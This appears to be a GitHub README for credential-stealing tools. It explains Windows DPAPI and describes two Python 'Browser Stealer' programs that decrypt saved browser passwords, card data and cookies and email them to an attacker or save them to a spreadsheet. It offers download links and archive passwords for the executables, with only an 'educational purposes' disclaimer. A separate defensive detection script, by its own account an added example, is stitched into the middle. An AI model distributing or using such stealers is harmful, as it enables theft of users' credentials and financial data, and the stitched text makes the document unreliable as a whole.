
Applications store information that is decrypted using DPAPI, which means an attacker may be able to capture passwords. For use in attack scenarios, two applications written in Python have been developed that steal the information stored in internet browsers: 1-Browser Stealer, 2-Browser Stealer Report


abdulkadir-gungor/DPAPI


Data Protection Application Programming Interface (DPAPI)

DPAPI is a simple cryptographic programming interface that has been built into Windows since Windows 2000. In theory the Data Protection API can enable symmetric encryption of any kind of data; in practice, its primary use in the Windows operating system is to perform symmetric encryption of asymmetric private keys, using a user or system secret as a significant contribution of entropy.

What does DPAPI protect?

DPAPI is used to protect the following personal data:
- Passwords and form auto-completion data in Internet Explorer, Yandex, Google "Chrome", etc.
- E-mail account passwords in Outlook, Windows Mail, etc.
- Access passwords for shared folders and resources
- Internal FTP manager account passwords
- Outlook for S/MIME
- Wireless network account keys and passwords
- Private keys for Encrypting File System (EFS) and for SSL/TLS in Internet Information Services
- Network passwords in Credential Manager
- Personal data in any application protected with the API function

Why is DPAPI important for cybersecurity?

Applications store information that is decrypted using DPAPI, which means an attacker may be able to capture passwords. For use in attack scenarios, two applications written in Python have been developed that steal the information stored in internet browsers.

- Browser Stealer
- Browser Stealer Report

Browser Stealer

Browser Stealer finds internet browsers and applications that use those browsers. It detects files that hold personal information such as usernames, passwords and credit card information. It decrypts these files using DPAPI and transmits the information to the attacker via email.
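Seen from the defender's side, the behaviour described above is a non-browser process reading browser secret stores and then opening a mail connection. The following detection sketch is an added example, not code from this repository; it assumes events already normalised into dicts from file-access auditing (such as Security event 4663) and network-connection logging (such as Sysmon event 3), and the allow-list, time window, `make_event` helper and sample events are constructed for illustration.

```python
import ntpath

# Chromium-family profile files holding DPAPI-protected secrets or the key that unlocks them.
SENSITIVE_FILES = {"login data", "web data", "cookies", "local state"}
# Assumption: images expected to open those files in this environment; extend per fleet.
ALLOWED_IMAGES = {"chrome.exe", "msedge.exe"}
MAIL_PORTS = {25, 465, 587}   # SMTP and mail submission ports
WINDOW_SECONDS = 300          # Assumption: correlation window between read and send

def find_suspects(events):
    """Flag non-browser processes that read browser secret stores; escalate to
    'high' when the same process opens a mail connection within the window."""
    alerts = {}
    for ev in sorted(events, key=lambda e: e["time"]):
        key = (ev["host"], ev["pid"], ev["image"].lower())
        if ev["type"] == "file_read":
            name = ntpath.basename(ev["path"]).lower()
            # Basename matching keeps the example short; in production compare
            # the full image path and the code-signing publisher instead.
            if name in SENSITIVE_FILES and ntpath.basename(key[2]) not in ALLOWED_IMAGES:
                a = alerts.setdefault(key, {
                    "host": ev["host"], "image": ev["image"], "files": set(),
                    "last_read": 0, "severity": "medium", "mail_dest": None})
                a["files"].add(name)
                a["last_read"] = ev["time"]
        elif ev["type"] == "net_connect" and key in alerts:
            a = alerts[key]
            if ev["dport"] in MAIL_PORTS and ev["time"] - a["last_read"] <= WINDOW_SECONDS:
                a["severity"] = "high"
                a["mail_dest"] = f'{ev["dest"]}:{ev["dport"]}'
    return list(alerts.values())

def make_event(time, pid, image, type_, **extra):
    """Hypothetical helper that builds one normalised event for host WS01."""
    return {"time": time, "host": "WS01", "pid": pid, "image": image, "type": type_, **extra}

# Constructed sample events (not taken from the page or from a real host).
PROFILE = r"C:\Users\alice\AppData\Local\Google\Chrome\User Data"
CHROME = r"C:\Program Files\Google\Chrome\Application\chrome.exe"
UNKNOWN = r"C:\Users\alice\Downloads\invoice_viewer.exe"
SAMPLE_EVENTS = [
    make_event(100, 4120, CHROME, "file_read", path=PROFILE + r"\Default\Login Data"),
    make_event(200, 7788, UNKNOWN, "file_read", path=PROFILE + r"\Local State"),
    make_event(205, 7788, UNKNOWN, "file_read", path=PROFILE + r"\Default\Login Data"),
    make_event(230, 7788, UNKNOWN, "net_connect", dest="203.0.113.25", dport=587),
    make_event(300, 9001, r"C:\Tools\backup.exe", "file_read", path=PROFILE + r"\Default\Cookies"),
]

if __name__ == "__main__":
    for alert in find_suspects(SAMPLE_EVENTS):
        print(alert["severity"], alert["image"], sorted(alert["files"]), alert["mail_dest"])
```

The medium-severity hit on `backup.exe` shows why the allow-list needs tuning: legitimate backup or sync agents also read these files, so they should be allow-listed by path and signer rather than suppressed wholesale.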

For more information.

Screenshot [1]


(Executable) Browser Stealer Download
Browser_Stealer.rar --> zip password: "BrOWserSteaLEr2022"
Link = https://drive.google.com/file/d/1Q2XkhU64vHzKfyxmuPh-c9U3JdoqFeyS/view?usp=sharing

Browser Stealer Report

Browser Stealer Report finds internet browsers and applications that use those browsers. It detects files containing personal information such as usernames, passwords, credit card information and cookies. It decrypts these files using DPAPI and saves the information in an Excel file named "Report.xls".

For more information.

Screenshot [1]


Screenshot [2]


(Executable) Browser Stealer Report
Browser_Stealer_Report.rar --> zip password: "BroWSerSteaLErRePOrt2022"
Link = https://drive.google.com/file/d/13ZrjFqpua_BijbaE52RQ2gfCPX65Mubh/view?usp=sharing

Legal Warning

Run your tests on virtual machines. The responsibility for illegal use belongs to the user. Shared for educational purposes.
